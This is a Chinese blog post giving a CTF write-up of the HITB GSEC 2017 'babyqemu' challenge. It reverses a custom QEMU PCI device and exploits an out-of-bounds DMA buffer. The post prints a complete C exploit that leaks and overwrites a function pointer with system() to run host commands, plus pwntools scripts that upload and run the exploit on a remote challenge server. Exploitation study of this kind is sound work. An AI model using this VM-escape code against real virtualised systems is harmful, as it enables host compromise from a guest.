HITB GSEC2017 pwn BABYQEMU

最新推荐文章于 2024-06-21 17:42:29 发布
最新推荐文章于 2024-06-21 17:42:29 发布
阅读量482 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122095051
版权 
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic  -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda

启动的bash脚本直接看出设备是hitb。

我们在文件系统的/etc/shadow中找到用户名是root 密码是空。
在这里插入图片描述
直接搜索
在这里插入图片描述比我们一般熟知的函数多了几个。

我们一般熟悉的有啥呢?
首先是总的结构体 pci_hitb_register_types
然后是type_init一直往下调用的函数 do_qemu_init_pci_hitb_register_types ,里面继续调用module_init用来初始化typeinfo、typelmpl结构体。
然后调用 hitb_class_init 初始化基类
然后调用 pci_hitb_realize 初始化类对象
hitb_instance_init 是总的结构体中的一个函数
然后就是mmio + pmio一共九个函数。

这个题没有pmio两个,但是多了六个不知道干嘛的。
在这里插入图片描述
我们一会一个一个分析。

首先 视图 子视图 本地类型 编辑
在这里插入图片描述
把我们的核心结构体拿出来。
里面刚开始那几个结构体都是系统自定义的,不需要管他。

要注意的是dma_state
在这里插入图片描述
还有QEMUTimer_0
其实也就是QEMUTimer
在这里插入图片描述
所以长这样

在这里插入图片描述

还要注意的是
在这里插入图片描述在这个函数里我们可以看见只注册了mmio,所以我们刚刚分析的没错,没有pmio。

在这里插入图片描述在这个设备里我们直接可以拿到设备号

在这里插入图片描述

所以我们可以直接
在这里插入图片描述这样来访问他的mmio存储空间。

我们知道他的起始空间是0xfea00000,大小是0x100000

因为 pci_hitb_realize 初始化类对象,所以我们做一个具体分析。
在这里插入图片描述timer_init_tl设置了&pdev->dma_timer的回调函数是hitb_dma_timer,回调函数的参数是pdev
倒数第二行memory_region_init_io函数就是初始化内存映射IO,指定了MMIO的操作&hitb_mmio_ops

这个的read和write分别指向hitb_mmio_read,hitb_mmio_write
在这里插入图片描述

最后pci_register_bar将&pdev->mmio注册到qemu PCI设备的BAR
Base Address Registers,BAR记录了设备所需要的地址空间的类型,基址以及其他属性。
其中第二个参数0,代表注册的是MMIO,假如是1就代表注册PMIO

hitb_instance_init函数

首先里面有个奇怪的结构体

首先我们理性分析一波,这个结构体到底是啥结构体,我们知道这个函数也是结构体的一个成员,就是HitbState结构体的一个成员,然后我们在这里也看见了这个结构体的身影。
在这里插入图片描述
其实就是那个结构体

在这里插入图片描述我们可以看到v1是HitbState结构体, + 0x1BC0是那个dma_mask,那-1就是enc。
所以这个函数做的就是把结构体的enc指针指向那个函数。

我们还要注意的是,这一切的一切,都只是发生在我们熟知的csu_init中。

那么我们来具体分析剩下的三个关键逻辑函数

首先是hitm_mmio_read
在这里插入图片描述
结构体里那点东西基本上是想读啥读啥了。

然后是hitm_mmio_write
在这里插入图片描述
看上去非常的麻烦,里面还有一些乱七八糟的函数。
其实我们注意到里面只要没有带hitb的都是系统函数,我们其实操控不了他,也没必要去管他。

当addr为0x80的时候,将value赋值给dma.src。
当addr为144的时候,将value赋值给dma.cnt。
当addr为152的时候,将value赋值给dma.cmd,并触发timer_mod。
当addr为136的时候,将value赋值给dma.dst。

那么关键就是这个timer_mod是干嘛的???

我们首先要注意到
在这里插入图片描述
time_mod里面是对ts的expire_time的修改。

在这里插入图片描述
ts是个结构体,在realize中被注册。
设置了hitb_dma_timer函数是他的回调函数。
那么就意味着我们time_mod对expire_time的修改会触发hitb_dma_timer。

在这里插入图片描述
至于这里写的time_list其实是告诉我们这是一个QEMUTimer结构体,是一个定时器结构体,他在QEMUTimerList中。
那我们现在来好好看一下hitb_dma_timer

在这里插入图片描述
不大好看
在这里插入图片描述
同步一下结构体就好了。
我们简单分析一下,就是根据dma.cmd的值来实现两个功能。
具体功能都跟那个cpu_physical_emmory_rw函数有关。

没有hitb,是个系统函数。
找到源码

void __fastcall cpu_physical_memory_rw(hwaddr addr, uint8_t *buf, int len, int is_write)
{
  int v4; // er8
  MemTxAttrs_0 v5; // 0:dl.1

  v4 = len;
  v5 = (MemTxAttrs_0)1;
  address_space_rw(&address_space_memory, addr, v5, buf, v4, is_write != 0);
}

MemTxResult __fastcall address_space_rw(AddressSpace_0 *as, hwaddr addr, MemTxAttrs_0 attrs, uint8_t *buf, int len, _Bool is_write)
{
  MemTxResult result; // eax

  if ( is_write )
    result = address_space_write(as, addr, attrs, buf, len);
  else
    result = address_space_read_full(as, addr, attrs, buf, len);
  return result;
}

其实我们从函数名字就能看得出来,是对物理地址的读写。

当dma.cmd为2|1时,将数据从dma_buf[dma.src减0x40000]拷贝利用函数cpu_physical_memory_rw拷贝至物理地址dma.dst中,拷贝长度为dma.cnt。
当dma.cmd为4|2|1时,将起始地址为dma_buf[dma.src减0x40000],长度为dma.cnt的数据利用利用opaque->enc函数加密后,再调用函数cpu_physical_memory_rw拷贝至物理地址opaque->dma.dst中。
当dma.cmd为0|1时,调用cpu_physical_memory_rw将物理地址中为dma.dst,长度为dma.cnt,拷贝到目标地址为dma_buf[dma.src减0x40000]的空间中。

那么问题就出在,dma_buf可以越界。

首先我们要想办法获得虚拟地址对应的物理地址。

这个是raycp师傅的

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        die("open pagemap");
    }
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

那么我们整个的利用思路就是利用enc函数先泄露程序基地址。
具体方法是首先mmap一块内存,

然后任意写,enc改成system的plt表的地址
dma_buf中改成我们要的字符串。

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

#define DMABASE 0x40000
char *userbuf;
uint64_t phy_userbuf;
unsigned char* mmio_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

uint64_t page_offset(uint64_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        die("open pagemap");
    }
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_write(uint32_t addr, uint32_t value)
{
    *((uint32_t*)(mmio_mem + addr)) = value;
}

uint32_t mmio_read(uint32_t addr)
{
    return *((uint32_t*)(mmio_mem + addr));
}

void dma_set_src(uint32_t src_addr)
{
    mmio_write(0x80,src_addr);
}

void dma_set_dst(uint32_t dst_addr)
{
    mmio_write(0x88,dst_addr);
}

void dma_set_cnt(uint32_t cnt)
{
    mmio_write(0x90,cnt);
}

void dma_do_cmd(uint32_t cmd)
{
    mmio_write(0x98,cmd);
}

void dma_do_write(uint32_t addr, void *buf, size_t len)
{
    assert(len<0x1000);

    memcpy(userbuf,buf,len);

    dma_set_src(phy_userbuf);
    dma_set_dst(addr);
    dma_set_cnt(len);
    dma_do_cmd(0|1);

    sleep(1);

}

void dma_do_read(uint32_t addr, size_t len)
{

    dma_set_dst(phy_userbuf);
    dma_set_src(addr);
    dma_set_cnt(len);

    dma_do_cmd(2|1);

    sleep(1);
}

void dma_do_enc(uint32_t addr,size_t len)
{
    dma_set_src(addr);
    dma_set_cnt(len);
    dma_do_cmd(1|4|2);
}


int main(int argc, char *argv[])
{
    
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    printf("mmio_mem @ %p\n", mmio_mem);
    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    mlock(userbuf, 0x1000);
    phy_userbuf=gva_to_gpa(userbuf);
    printf("user buff virtual address: %p\n",userbuf);
    printf("user buff physical address: %p\n",(void*)phy_userbuf);

    dma_do_read(0x1000+DMABASE,8);    
    uint64_t leak_enc=*(uint64_t*)userbuf;
    printf("leaking enc function: %p\n",(void*)leak_enc);
    uint64_t pro_base=leak_enc-0x283DD0;
    uint64_t system_plt=pro_base+0x1FDB18;
    
    dma_do_write(0x1000+DMABASE,&system_plt,8);

    char *command="cat /root/flag\x00";
    dma_do_write(0x200+DMABASE,command,strlen(command));

    dma_do_enc(0x200+DMABASE,8);
}

在这里插入图片描述

最后说一下打远程服务器怎么操作。
在这里插入图片描述在exp文件目录下建立一个poc文件夹,然后exp,exp.c都复制进去

然后跑一下这个脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os

# context.log_level = 'debug'
cmd = '$ '


def exploit(r):
    r.sendlineafter(cmd, 'stty -echo')
    os.system('musl-gcc  -static -O2 ./poc/exp.c -o ./poc/exp')
    os.system('gzip -c ./poc/exp > ./poc/exp.gz')
    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64')
    r.sendline((read('./poc/exp.gz')).encode('base64'))
    r.sendline('EOF')
    r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
    r.sendlineafter(cmd, 'gunzip ./exp.gz')
    r.sendlineafter(cmd, 'chmod +x ./exp')
    r.sendlineafter(cmd, './exp')
    r.interactive()


p = process('', shell=True)
# p = remote('', )

exploit(p)

然后发现因为用的是这个cat,速度相当慢,慢的夸张
然后问了大佬

from pwn import *
import base64
import os


#context.log_level = 'debug'
r = remote('node4.buuoj.cn', 29886)
r.sendlineafter("HITB login: ", "root")

def exec_cmd(str):
    r.sendlineafter("# ", str)

def upload():
    p = log.progress("Upload")

    with open("./poc/exp", "rb") as f:
        data = f.read()

    encoded = base64.b64encode(data)

    for i in range(0, len(encoded), 300):
        p.status("%d / %d" % (i, len(encoded)))
        exec_cmd("echo \"%s\" >> benc" % (encoded[i:i+300]))

    exec_cmd("cat benc | base64 -d > bout")
    exec_cmd("chmod +x bout")

    p.success()               

upload()
exec_cmd("./bout")
r.interactive()

这个真🐂

refer

https://tianstcht.github.io/Q%E4%B9%8B%E9%80%83%E9%80%B8-%E5%8F%81%E4%B9%8B%E5%9E%8B-HITB-CTF-2017-babyqemu/

https://ray-cp.github.io/archivers/qemu-pwn-hitb-gesc-2017-babyqemu-writeup

https://www.giantbranch.cn/2020/01/02/CTF%20QEMU%20%E8%99%9A%E6%8B%9F%E6%9C%BA%E9%80%83%E9%80%B8%E4%B9%8BHITB-GSEC-2017-babyqemu/

yongbaoii
关注
专栏目录
hitb-2017 1000levels writeup
jmp esp
08-28 1695
题目分析题目设置的还是比较巧妙的。本身是一个二进制的文件,linux 64环境,保护情况如下: Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled功能一共三个: 1. go:
XCTF 3rd-HITB CTF-2017 arrdeepee 复现
m0_46580995的博客
07-05 1261
题目说明 我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是,我们忘记备份我们的flag文件了。幸运的是,我们有一个攻击者网络流量捕获。你可以帮我们恢复出flag文件吗? 得到的是一个pcap包 有大量的tcp和udp流 查看udp流有以下的关键字 “ TSSecKeySet1”和“ Microsoft Strong Cryptographic Provider” 保存下来进行分析 有一些证书和私钥尝试openss
qemu pwn 2021 HWS FastCP
yongbaoii的博客
03-30 689
我怀疑虎符那道hfdev就是参考它来的 hfdev会了之后这道没压力
安装qemu
lfdanding的专栏
11-15 631
sudo apt-get install zlib1g sudo apt-get install zlib1g-dev sudo apt-get install libglib2.0-dev sudo apg-get install dh-autoreconf sudo apt-get install gcc libsdl1.2-dev zlib1g-dev libasound2-dev linux
firebird——gsec命令
weixin_30301183的博客
05-05 319
自带帮助命令为: C:\Users\Administrator>gsec -? gsec utility - maintains user password database command line usage: gsec [ ... ] [ ... ] interactive usage: gsec [ ... ]...
【airbus-seclab/qemu_blog加工翻译 03】深入探讨 QEMU:内存区域
m0_51246873的博客
02-04 911
在这篇文章中,我们将了解 QEMU 中的高级内存组织:内存区域 (MR)。我们不会讨论地址空间,因为我们通常直接管理内存区域。但是,请查看和代码()以获取更多详细信息。提供了内存组织的高级外部演示。您还可以在找到非常有趣的内部文档。这是用于访问内存的可用 QEMU API 的枚举。在专门讨论 TCG 的博客文章中,我们将准确了解翻译后的指令如何访问 VM 内存以及我们如何在此级别进行拦截。
linux驱动开发学习笔记十八:认识一下内核定时器
耐心的小黑的博客
05-06 2169
一、内核时间管理 系统节拍率 Linux 内核中有大量的函数需要时间管理,比如周期性的调度程序、延时程序、对于我们驱动编写者来说最常用的定时器。硬件定时器提供时钟源,时钟源的频率可以设置, 设置好以后就周期性的产生定时中断,系统使用定时中断来计时。中断周期性产生的频率就是系统频率,也叫做节拍率(tick rate)(有的资料也叫系统频率),比如 1000Hz,100Hz 等等说的就是系统节拍率...
HITB2017-babyqemu && 2019数字经济-qemu
11-05
【标题】"HITB2017-babyqemu && 2019数字经济-qemu" 提到的两个主题涉及到的是在信息安全领域中的技术挑战和数字经济发展中的虚拟化技术应用。HITB(Hack in The Box)是一个知名的网络安全会议,而"babyqemu"可能是...
191018 pwn-HITB_dubai polyfill
热门推荐
whklhhhh的博客
10-18 2万+
Polyfill 写作dubai-ctf,然而在阿布扎比举办233 风格迥异,被毛子吊锤一百遍啊一百遍 第二天主要在看一个wasm的pwn,发现了UAF的漏洞但是由于对heap没了解所以没写利用。队里的pwn手觉得没法用所以没写,最后偷了流量重发爽了一天。赛中修复了题目,但是并没有起效。事后分析了一下确实是那个UAF的洞。 题目文件 http是一个web演示接口,可以通过html+js+engin...
mod_timer 定时器
11-11 1352
内核通过函数mod_timer来实现已经激活的定时器超时时间: mod_timer(&my_timer, jiffies+new_delay); mod_timer函数也可以操作那些已经初始化,但还没有被激活的定时器,如果定时器没有激活,mod_timer会激活它。如果调用时定时器未被激活,该函数返回0,否则返回1。一旦从mod_timer函数返回,定时器都将被激活而且设置了新的定时值。
QEMU 简单使用
务远的博客
09-18 2万+
安装: yum install qemu 创建image文件: qemu-img create -f qcow2 guest.qcow2 3G 安装linux: 1)下载一个镜像文件,http://download-node-02.eng.bos.redhat.com/composes/latest-RHEL7/compose/Server/ppc64le/iso/RHEL-7.3-20160
Linux驱动之定时器(mod_timer)
转载和创作优秀的博客
03-20 1181
文章摘自一下几位网友。非常感谢他们。 http://blog.sina.com.cn/s/blog_57330c3401011cq3.html Linux的内核中定义了一个定时器的结构: #include<linux/timer.h>struct timer_list { struct list_head list;   unsigned long expires; //定时器到期时间  unsigned long data; //作为参数被
【linux内核定时器】mod_timer( ),第二个参数设置问题
qq_45220774的博客
04-16 302
#关于第二个参数的设置,发现若直接使用timer结构体的expires变量,例如mod_timer(&timer, timer.expires), 会出现设置超时时间错误的情况,导致超时时间非常小,从而不间断地调用function,而不直接使用timer.expires作为参数,而是重新设置超时时间,例如 jiffies + msecs_to_jiffies(500) ,设置500ms作为超时时间则不会出现上述错误,不知道原因,希望有大佬能解决。
CTF-pwn-虚拟化-qemu前置知识
最新发布
llovewuzhengzi的博客
06-21 641
当对设备其所在的内存访问时,会调用注册的读mmio函数d3dev_mmio_read,读的位置是基地址+0x128,是4字节。每个qemu虚拟机都是宿主机上的一个进程,在进程中用mmap分配出大小为0x40000000字节的宿主机的虚拟内存来作为虚拟机的物理内存。设备会注册自己的MMIO和PMIO读写函数,当检测到访问其所在的内存或端口时调用注册的读写函数,实现对设备内存的读写功能。其中对于形如0000:00:03.0的数据,0000是域,00是总线号,03是设备号,0是功能号。
热门网络安全认证
新华编程特战队
11-26 119
公认的网络安全认证,以及在较小程度上显示成功完成网络安全课程的证书,可以向雇主证明您的网络安全知识符合某些标准,并帮助您沿着理想的职业道路前进。因此,拥有 CISSP 证书的人,他们总是有几年的经验,通常比未经认证的同行和持有其他网络安全认证的同行都要高。所有主要信息安全证书的颁发者都为雇主提供了验证某人是否持有任何声称的证书的能力。CISSP 旨在由在信息安全领域拥有多年经验的人参加——事实上,虽然您可以在没有经验的情况下参加 CISSP 考试,但在您在该领域工作之前,您实际上不会获得证书所需的年限。
QEMU中的事件处理机制-------timer(以openpic中的定时器为例)
sinat_38205774的博客
02-25 873
1.新建timer 在创建openpic的模型中创建定时器,定时器创建流程如下图所示 生成如下结构关系 2.启动Timer case 0x10: /* TBCR */ /* Did the enable status change? */ if ((opp->timers[idx].tbcr & TBCR_CI) != ...
XCTF 华为云专场 qemuzzz
yongbaoii的博客
01-27 614
绿 #! /bin/sh #gdb --args \ ./qemu-system-x86_64 \ -initrd ./rootfs.cpio \ -kernel ./bzImage \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kalsr' \ -monitor /dev/null \ -m 64M --nographic \ -device zzz \ -L pc-bios 启动脚本 看起来设备叫zzz 去ida分析分.
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值